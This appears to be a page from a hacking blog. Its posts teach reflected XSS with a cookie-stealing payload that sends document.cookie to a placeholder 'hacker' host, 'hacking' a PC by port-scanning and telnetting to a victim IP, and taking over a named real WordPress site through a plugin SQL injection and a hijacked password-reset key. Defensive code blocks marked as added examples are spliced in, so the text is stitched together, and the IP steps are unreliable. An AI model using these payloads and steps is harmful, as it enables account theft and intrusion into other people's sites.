C-T-H

Tuesday


How to hack a website using Cross site scripting (XSS)

What is Cross-Site Scripting?

As quoted on Wikipedia:
"Cross-site scripting (XSS) is a type of computer security vulnerability typically found in web applications that enables malicious attackers to inject client-side script into web pages viewed by other users. An exploited cross-site scripting vulnerability can be used by attackers to bypass access controls such as the same origin policy. Cross-site scripting carried out on websites were roughly 80% of all security vulnerabilities documented by Symantec as of 2007. Their impact may range from a petty nuisance to a significant security risk, depending on the sensitivity of the data handled by the vulnerable site, and the nature of any security mitigations implemented by the site's owner."


There is no single, standardized classification of cross-site scripting flaws, but most experts distinguish between at least two primary flavors of XSS: non-persistent and persistent.

In this tutorial I will explain the non-persistent attack.

First of all, you must find a vulnerable site.

How To Find Vulnerable Websites ?


  • Google hacking
  • Using web vulnerability scanners

Google hacking :-
Google hacking is the term used when a hacker tries to find exploitable targets and sensitive data by using search engines. The Google Hacking Database (GHDB) is a database of queries that identify sensitive data. Although Google blocks some of the better known Google hacking queries, nothing stops a hacker from crawling any site and launching the Google Hacking Database queries directly onto the crawled content.

Update: To learn Google hacking, you can download the Google Hacking for Penetration Testers book & password from here.



Web Vulnerability Scanners:
A vulnerability scanner is a computer program designed to assess computers, computer systems, networks or applications for weaknesses. There are a number of types of vulnerability scanners available today, distinguished from one another by a focus on particular targets. While functionality varies between different types of vulnerability scanners, they share a common, core purpose of enumerating the vulnerabilities present in one or more targets. Vulnerability scanners are a core technology component of vulnerability management.



After finding a site, enter the simple JavaScript given below in the search box or URL bar:
<SCRIPT>alert("XSS testing by ComeToHack.com");

If a dialog box pops up, then the site is vulnerable to XSS.

In the above example we added a harmless alert dialog box. In the next example I will show how a more sophisticated and dangerous XSS attack can be used to exploit users. One typical example is a simple cookie theft exploit.

 var+img=new+Image();img.src= "http://hacker/"%20+%20                            document.cookie;

The previous JavaScript creates an image DOM object.



var img=new Image();



Since the JavaScript code executes within the http://victim/ context, it has access to the cookies.

The image object's source is then pointed at the hacker's website, where the victim's cookies are stored.


img.src="http://hacker/"%20+%20document.cookie;


Once the hacker has completed his exploit code, it looks like:

http://victim/ context=">">+var+img=new+Image();img.src= "http://hacker/document.cookie;



Now the hacker will advertise this specially crafted link through spam e-mail, message board posts, instant messages (IM), and others, trying to attract user clicks. What makes this attack so effective is that users are more likely to click on the link because the URL contains the real website domain name, rather than a look-alike domain name as in normal phishing.
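As an added example (not part of the original post), this shows the defenses that break the crafted link described above: encoding the reflected value so the browser treats it as text, marking the session cookie HttpOnly so page script cannot read it, and a Content-Security-Policy that refuses inline script and off-site image loads. All function names and the probe string are hypothetical and constructed for the example.

```javascript
// Added example: server-side helpers for a page that echoes a search term.
const HTML_ESCAPES = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };

// Encode every character that can end a text node or an attribute value.
function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Vulnerable pattern: the term is concatenated into markup unchanged,
// so markup in the query string becomes markup in the page.
function renderResultsUnsafe(term) {
  return `<p>Results for: ${term}</p>`;
}

// Hardened pattern: the same template, with the value encoded on output.
function renderResultsSafe(term) {
  return `<p>Results for: ${escapeHtml(term)}</p>`;
}

// HttpOnly keeps the cookie out of document.cookie, so an injected script
// has nothing to send. Secure and SameSite limit where it travels.
function sessionCookieHeader(sessionId) {
  return `sid=${encodeURIComponent(sessionId)}; HttpOnly; Secure; SameSite=Lax; Path=/`;
}

// Defense in depth: no inline script, and images only from the site itself,
// which also blocks an image request to a third-party host.
function securityHeaders() {
  return { "Content-Security-Policy": "default-src 'self'; script-src 'self'; img-src 'self'" };
}

// Constructed probe, equivalent to the harmless alert test in the post.
const PROBE = '<script>alert("test")</script>';
console.log(renderResultsUnsafe(PROBE)); // script tag survives
console.log(renderResultsSafe(PROBE));   // script tag is inert text
console.log(sessionCookieHeader("abc 123"));
```
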

Hope you liked this post. If you have any doubts, please feel free to comment.

How to Hack Any Computer / Victim PC with IP


Computer hacking is the most famous work of hackers. Once hackers have an IP address, they can toy with the victim easily, without the victim even knowing what is happening to their computer. Normal PC users do not know about security, and large numbers of computer users know nothing about securing their computers. ComeToHack.com presents an easy tutorial on how to hack any target computer with only its IP address in a few simple steps. With the help of Metasploit you can even fully control the victim's entire network or computer just by having the computer's IP address. Generally, hacking is the term that refers to gaining access to someone's computer without permission or interest.


Steps to Hack IP Address:



1) Prepare the IP address of the victim (e.g. 101.23.53.70).

2) Download and install Advanced Port Scanner.

3) Open Advanced Port Scanner, type the IP address in the right column and click Scan.

4) It will list all open ports of the victim's PC or router (e.g. port 91).

5) After retrieving the IP address and the open ports of the victim, open Command Prompt (CMD) and type: telnet [IP ADDRESS] [PORT]

e.g. telnet 101.23.53.70 91

6) Now you'll be asked to enter login information. Just type the username and password and hit Enter. If no password is used, just type the username.

Done! Now you'll get access to all of the victim's files and documents by browsing with CMD (use cd, copy, delete, mv… to do all tricks).


Enjoy :)
If you have any questions, comment here.

Monday


How to hack a wordpress site using SQLi injection

What is WordPress?

WordPress is a free and open source blogging tool and a content management system (CMS) based on PHP and MySQL. It has many features, including a plug-in architecture and a template system. WordPress is currently the most popular blogging system in use on the Web. It was first released on May 27, 2003, by founders Matt Mullenweg.

Now let's move on to hacking a website. I have used the all-video-gallery (WordPress plugin) SQLi vulnerability here.

1>First we will find a target using a Google dork:

inurl:all-video-gallery/config.php?vid=








2>Open any website. In my case it's juangrial.com.







3>Now let's do a SQL injection: copy the exploit code, then hit Enter, then see the magic.



Exploit Code for finding username & password:
http://site.com/wp-content/plugins/all-v...,7,8,9,10,

11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37​,38,

39,40,41+from+wp_users--



You can also try this. Both will work the same.


Exploit Code for finding username & email:
http://site.com/wp-content/plugins/all-v...,7,8,9,10,

11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37​,38,

39,40,41+from+wp_users-




4>We got the admin email. Now let's reset it.

For that, go to: http://site.com/wp-admin OR https://site.com/wp-login.php

Then click on "Lost Password".



5>Enter the email we got in the earlier steps.

6>Now come back and go to the activation table.

Exploit Code for activation key:
http://site.com/wp-content/plugins/all-v...,7,8,9,10,

11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37​,38,

39,40,41+from+wp_users--




7>We got what we need. Now let's change the admin password.

Go to: http://site.com/wp-login.php?action=rp&key=resetkey&login=username

8>Now open http://site.com/wp-admin and log in with the new password.
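As an added example (not part of the original post), the sequence above leaves a recognisable trail in web server access logs: a request to the plugin's config.php whose vid value is not a plain integer, followed by password-reset requests from the same client. The log lines, IP addresses and function names below are constructed for illustration.

```javascript
// Added example: flag non-numeric `vid` requests and later resets by the same IP.
const SAMPLE_LOG = [ // constructed lines, documentation-range IPs
  '198.51.100.7 - - [10/Mar/2014:10:01:02 +0000] "GET /wp-content/plugins/all-video-gallery/config.php?vid=12 HTTP/1.1" 200 512',
  '203.0.113.9 - - [10/Mar/2014:10:02:10 +0000] "GET /wp-content/plugins/all-video-gallery/config.php?vid=5,6,7+from+wp_users-- HTTP/1.1" 200 2048',
  '203.0.113.9 - - [10/Mar/2014:10:03:40 +0000] "POST /wp-login.php?action=lostpassword HTTP/1.1" 302 0',
  '203.0.113.9 - - [10/Mar/2014:10:05:01 +0000] "GET /wp-login.php?action=rp&key=EXAMPLEKEY&login=admin HTTP/1.1" 200 1890',
  '198.51.100.7 - - [10/Mar/2014:10:06:00 +0000] "POST /wp-login.php?action=lostpassword HTTP/1.1" 302 0',
];

const LINE_RE = /^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) HTTP\/[\d.]+"/;

// Pull client IP, path and decoded query parameters out of one log line.
function parseLine(line) {
  const m = LINE_RE.exec(line);
  if (!m) return null;
  try {
    const url = new URL(m[2], "http://placeholder.invalid");
    return { ip: m[1], path: url.pathname, params: url.searchParams };
  } catch (err) {
    return null; // unparseable request target
  }
}

function findSuspectResets(lines) {
  const injectors = new Set(); // clients that sent a non-integer vid
  const alerts = [];
  for (const line of lines) {
    const req = parseLine(line);
    if (!req) continue;
    if (req.path.endsWith("/all-video-gallery/config.php")) {
      const vid = req.params.get("vid");
      // A video id is an integer; anything else is worth a look.
      if (vid !== null && !/^\d+$/.test(vid)) {
        injectors.add(req.ip);
        alerts.push({ ip: req.ip, type: "non-numeric vid", detail: vid });
      }
    } else if (req.path === "/wp-login.php" && injectors.has(req.ip)) {
      const action = req.params.get("action");
      if (action === "lostpassword" || action === "rp") {
        alerts.push({ ip: req.ip, type: "reset after injection", detail: action });
      }
    }
  }
  return alerts;
}

console.log(findSuspectResets(SAMPLE_LOG));
```

Detection of this kind complements the actual fix, which is validating vid as an integer before it reaches the query and keeping the plugin updated or removed.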





Friday


How to Make Single Name on Facebook Profile / Timeline


Facebook is now the biggest social media site in the world. Today Technoraise is sharing an amazing trick: making a single-name account on Facebook.
Note: This trick only works on Mozilla Firefox. If you don't have Mozilla Firefox, download the latest version.
First, change your browser proxy manually, using one of the proxies given below.
Port: 8080
Now save your settings.
Now open your Facebook account's name settings.
Change your language from English (US) to Bahasa Indonesia.
Then simply remove your last name and save it.
Now your Facebook account has only a first name, without a last name.
After completing all steps, remove the manual proxy, select "Use system proxy settings" and change your language back to English (US).


If you are facing any problem making a single-name account on Facebook, comment below.
Regards, Technoraise. Keep visiting and keep sharing, thanks :)
